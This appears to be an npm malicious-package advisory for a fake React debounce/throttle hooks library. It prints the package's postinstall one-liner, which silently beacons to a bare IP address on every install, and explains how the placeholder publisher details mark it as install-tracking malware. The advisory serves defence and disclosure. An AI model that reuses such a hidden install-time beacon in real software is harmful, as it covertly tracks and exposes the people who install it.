VYPR

npm · Malicious package advisory

Malware

react-hook-use-debounce-throttle-12

MAL-2026-5909

Malicious code in react-hook-use-debounce-throttle-12 (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b0a4d8a0470a3e7fcb2da7cdb29ba6412125924a486aa6f4a437ccfbeb5ca4af)
package.json declares a postinstall hook that runs `node -e` to issue an HTTPS request to the bare IP 8.140.205.78 on port 80 with all errors silently swallowed: `require('https').request({hostname:'8.140.205.78',port:80,path:'/',method:'GET',timeout:3000}).on('error',function(){}).end()`. The package advertises itself as a React debounce/throttle hooks library and has no legitimate need for network activity at install time. The destination is a bare IPv4 address with no TLS, no publisher correlation, and no documented purpose; the request fires unconditionally on every `npm install`, leaking the installer's IP, install timing, and machine footprint to the operator of that host. Author metadata is a generic placeholder (`dev-utils <dev@utils-lib.dev>`) with a repository URL that does not resolve to a real project, and the package name carries a numeric suffix consistent with disposable republishes. The combination of an install-time beacon to attacker-controlled infrastructure, mismatched purpose, silent error handling, and placeholder publisher identity is a victim-enumeration/install-tracking attack.

Compromised versions (3)

  • 1.0.0
  • 1.0.2
  • 1.0.1

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.